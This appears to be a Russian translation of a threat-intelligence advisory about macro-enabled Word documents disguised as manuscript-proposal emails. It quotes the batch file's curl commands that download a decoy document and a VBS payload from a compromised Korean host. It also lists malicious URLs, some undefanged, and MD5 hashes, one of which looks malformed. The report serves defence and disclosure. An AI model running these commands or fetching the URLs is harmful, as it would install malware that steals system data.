Группа анализа ASEC недавно обнаружила, что вредоносное ПО, замаскированное под письмо с предложением рукописи (нацеленное на работников сферы безопасности)>, распространяется среди радиовещательных и обычных компаний, а также тех, кто работает в сфере безопасности.
Чтобы облегчить выполнение вредоносного макрокода, агент угроз использовал изображение, которое предлагает пользователям выполнить макрос. Это изображение постоянно использовалось в прошлом, и есть подозрение, что все они принадлежат одному и тому же оператору.
Ниже приведен список URL-адресов загрузки вредоносных макродокументов Word, выявленных нами дополнительно.
- hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm
- hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm
- hxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm
- hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm
- hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm
Когда вредоносный макрос внутри загруженного документа выполняется, он генерирует и запускает файл version.bat, содержащий команду curl. Пакетный файл содержит коды, которые загружают и выполняют обычный документ и дополнительный вредоносный скрипт. Используемые команды curl выглядят следующим образом.
1 2 | curl -o """ & fname & """ hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx curl -o %temp%\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60 |
Подтвержденные обычные документы, замаскированные под сопроводительные письма, предложения о приеме на работу и многое другое.
Как и в предыдущих случаях, дополнительный вредоносный скрипт передает на C&C-сервер следующие данные.
- Системная информация зараженного ПК
- Информация о вирусных вакцинах, установленных в системе
- Список недавно открытых файлов Word
- Информация о директории папки загрузки в системе
- Информация о запущенных процессах
- Модификация реестров, связанных с IE
- Регистрация в планировщике задач для поддержания соединения с сервером C&C.
В последнее время случаи распространения вредоносных программ, направленных на связанных с Северной Кореей лиц, распространяются и среди обычных корпоративных пользователей, призывая их к максимальной осторожности. Поэтому пользователям следует воздержаться от просмотра писем от неизвестных отправителей и соблюдать осторожность, чтобы макросы, включенные в документы Office, не запускались автоматически.
Indicators of Compromise
URls
- http://ddim.co.kr/gnuboard4/adm/cmg/upload/init.dotm
- http://gdtech.kr/gnuboard4/adm/cmg/attatch/init.dotm
- http://gdtech.kr/gnuboard4/adm/cmg/upload/list.php?query=60
- http://www.hydrotec.co.kr/bbs/img/cmg/upload2/init.dotm
- http://www.hydrotec.co.kr/bbs/img/cmg/upload3/init.dotm
MD5
- 3cdf9f829ed03e1ac17b72b636d84d0bs
- 55a46a2415d18093abcd59a0bf33d0a9
- 705ef00224f3f7b02e29f21eb6e10d02
- 83b4d96fc75f74bb589c28e8a9eddbbf
- 873b2b0656ee9f6912390b5abc32b276